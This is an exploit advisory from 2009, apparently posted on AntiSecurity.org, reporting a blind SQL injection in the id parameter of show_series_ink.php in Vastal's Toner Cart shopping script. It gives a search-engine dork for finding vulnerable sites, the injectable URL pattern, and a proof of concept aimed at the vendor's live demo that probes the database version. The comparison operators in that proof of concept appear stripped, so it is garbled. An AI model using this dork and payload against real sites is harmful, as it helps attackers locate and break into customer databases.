[x]========================================================================================================================================[x] | AntiSecurity[dot]org | [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Title : Toner Cart show_series_ink.php?id= blind sql Vulnerabilities | | Software : Toner Cart | | Vendor : http://www.vastal.com/ | | Demo : http://www.vastal.com/united/ | | Price : $400.00 | | Date : 23 September 2009 ( Indonesia ) | | Author : OoN_Boy | | Contact : oon.boy9@gmail.com | | Web : http://oonboy.info | | Blog : http://oonboy.blogspot.com | [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Description : Toner cart has all features needed for a toner business to go online. You can separate all the differentiate | | different types of toners from ribbons to inkjets to laser toners all can be added separately in the system. We | | divided the system into 3 parts so that it is easy for a customer to find a product they are interested in. The 3 | | parts include : Brands, Series, Sub Series and then products, we also provided an extensive search for the system | | so that customers can search for the products they want. The script has a built in affiliate system and ads | | management and is fully integrated with paypal and verisign. We have also provided an extensive admin panel so | | that you can manage all the chores with ease. Please feel free to ask any questions, We will be more than glad to | | answer them. Please note this is a open database so there might be some problems relating to images and data on | | the server when our customers and visitors try to edit it. But we upload the default database every week | [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | dork : inurl: show_series_ink.php?id= "Powered by Vastal I-Tech & Co" | [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Exploit : http://localhost/[path]/show_series_ink.php?id=[sql] | [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Proof of concept : http://www.vastal.com/united/show_series_ink.php?id=5+and+substring(@@version,1,1)5 True | | http://www.vastal.com/united/show_series_ink.php?id=5+and+substring(@@version,1,1)5 False | [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Greetz : antisecurity.org batamhacker.or.id | | h4ntu Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va | | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere | [x]========================================================================================================================================[x] [x]========================================================================================================================================[x] | Note : Please help to vote me in http://8.17.84.100/planyouradventour/profil_team.php?uid_group=1466598338 | [x]========================================================================================================================================[x]